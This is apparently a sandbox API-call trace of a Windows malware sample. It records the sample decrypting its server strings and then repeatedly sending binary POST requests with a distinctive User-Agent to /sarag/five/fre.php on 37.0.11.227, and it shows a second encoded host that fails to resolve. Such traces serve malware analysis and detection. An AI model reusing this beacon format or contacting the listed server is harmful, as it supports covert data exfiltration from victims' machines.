StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0323.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.209] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0323.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.210] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0323.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.212] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0323.212] GetProcessHeap () returned 0x690000 [0323.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0323.212] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0323.212] GetProcessHeap () returned 0x690000 [0323.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0323.212] socket (af=2, type=1, protocol=6) returned 0xb24 [0323.213] connect (s=0xb24, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0323.325] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0323.325] GetProcessHeap () returned 0x690000 [0323.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0323.325] GetProcessHeap () returned 0x690000 [0323.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0323.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.329] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0323.329] GetProcessHeap () returned 0x690000 [0323.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0323.329] GetProcessHeap () returned 0x690000 [0323.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.330] GetProcessHeap () returned 0x690000 [0323.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0323.330] GetProcessHeap () returned 0x690000 [0323.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0323.331] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.332] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0323.332] GetProcessHeap () returned 0x690000 [0323.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0323.332] GetProcessHeap () returned 0x690000 [0323.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.333] send (s=0xb24, buf=0x6ad508*, len=242, flags=0) returned 242 [0323.334] send (s=0xb24, buf=0x6aba40*, len=159, flags=0) returned 159 [0323.334] GetProcessHeap () returned 0x690000 [0323.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0323.334] recv (in: s=0xb24, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0323.426] GetProcessHeap () returned 0x690000 [0323.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0323.427] GetProcessHeap () returned 0x690000 [0323.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0323.428] GetProcessHeap () returned 0x690000 [0323.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0323.428] GetProcessHeap () returned 0x690000 [0323.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0323.428] closesocket (s=0xb24) returned 0 [0323.429] GetProcessHeap () returned 0x690000 [0323.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0323.430] GetProcessHeap () returned 0x690000 [0323.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.430] GetProcessHeap () returned 0x690000 [0323.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0323.430] GetProcessHeap () returned 0x690000 [0323.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0323.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1870) returned 0xb24 [0323.433] Sleep (dwMilliseconds=0xea60) [0323.435] GetProcessHeap () returned 0x690000 [0323.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0323.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0323.472] GetProcessHeap () returned 0x690000 [0323.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0323.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.511] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0323.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.512] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.513] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.513] GetProcessHeap () returned 0x690000 [0323.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0323.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.515] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0323.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.516] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0323.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.575] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0323.575] GetProcessHeap () returned 0x690000 [0323.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.576] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0323.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.577] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0323.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.580] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0323.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.583] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0323.583] GetProcessHeap () returned 0x690000 [0323.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0323.583] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0323.584] GetProcessHeap () returned 0x690000 [0323.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0323.584] GetProcessHeap () returned 0x690000 [0323.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.584] GetProcessHeap () returned 0x690000 [0323.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0323.585] GetProcessHeap () returned 0x690000 [0323.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0323.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.595] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0323.603] GetProcessHeap () returned 0x690000 [0323.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0323.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.605] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0323.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.606] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.607] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.607] GetProcessHeap () returned 0x690000 [0323.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0323.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.608] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0323.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.609] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0323.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.610] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0323.610] GetProcessHeap () returned 0x690000 [0323.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.620] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0323.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.624] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0323.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.625] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0323.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.626] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0323.626] GetProcessHeap () returned 0x690000 [0323.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0323.626] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0323.627] GetProcessHeap () returned 0x690000 [0323.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0323.627] socket (af=2, type=1, protocol=6) returned 0xb28 [0323.627] connect (s=0xb28, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0323.652] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0323.652] GetProcessHeap () returned 0x690000 [0323.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0323.652] GetProcessHeap () returned 0x690000 [0323.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0323.653] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.653] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0323.653] GetProcessHeap () returned 0x690000 [0323.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0323.653] GetProcessHeap () returned 0x690000 [0323.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.654] GetProcessHeap () returned 0x690000 [0323.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0323.654] GetProcessHeap () returned 0x690000 [0323.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0323.654] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.655] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0323.655] GetProcessHeap () returned 0x690000 [0323.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0323.655] GetProcessHeap () returned 0x690000 [0323.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.655] send (s=0xb28, buf=0x6ad508*, len=242, flags=0) returned 242 [0323.656] send (s=0xb28, buf=0x6aba40*, len=159, flags=0) returned 159 [0323.656] GetProcessHeap () returned 0x690000 [0323.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0323.656] recv (in: s=0xb28, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0323.743] GetProcessHeap () returned 0x690000 [0323.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0323.744] GetProcessHeap () returned 0x690000 [0323.744] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0323.745] GetProcessHeap () returned 0x690000 [0323.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0323.747] GetProcessHeap () returned 0x690000 [0323.747] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0323.747] closesocket (s=0xb28) returned 0 [0323.748] GetProcessHeap () returned 0x690000 [0323.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0323.748] GetProcessHeap () returned 0x690000 [0323.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.748] GetProcessHeap () returned 0x690000 [0323.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0323.749] GetProcessHeap () returned 0x690000 [0323.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0323.749] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1874) returned 0xb28 [0323.751] Sleep (dwMilliseconds=0xea60) [0323.752] GetProcessHeap () returned 0x690000 [0323.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0323.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0323.772] GetProcessHeap () returned 0x690000 [0323.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0323.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.773] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0323.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.774] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.775] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.775] GetProcessHeap () returned 0x690000 [0323.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0323.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.777] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0323.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.778] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0323.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.781] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0323.781] GetProcessHeap () returned 0x690000 [0323.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.782] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0323.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.784] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0323.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.834] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0323.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.835] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0323.835] GetProcessHeap () returned 0x690000 [0323.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0323.835] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0323.835] GetProcessHeap () returned 0x690000 [0323.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0323.836] GetProcessHeap () returned 0x690000 [0323.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.836] GetProcessHeap () returned 0x690000 [0323.837] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0323.837] GetProcessHeap () returned 0x690000 [0323.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0323.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.838] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0323.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0323.853] GetProcessHeap () returned 0x690000 [0323.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0323.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.857] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0323.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.858] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0323.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.859] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.860] GetProcessHeap () returned 0x690000 [0323.860] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0323.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.862] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0323.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.863] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0323.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0323.864] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0323.864] GetProcessHeap () returned 0x690000 [0323.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0323.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.865] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0323.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.866] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0323.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.868] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0323.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0323.869] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0323.869] GetProcessHeap () returned 0x690000 [0323.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0323.869] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0323.869] GetProcessHeap () returned 0x690000 [0323.869] 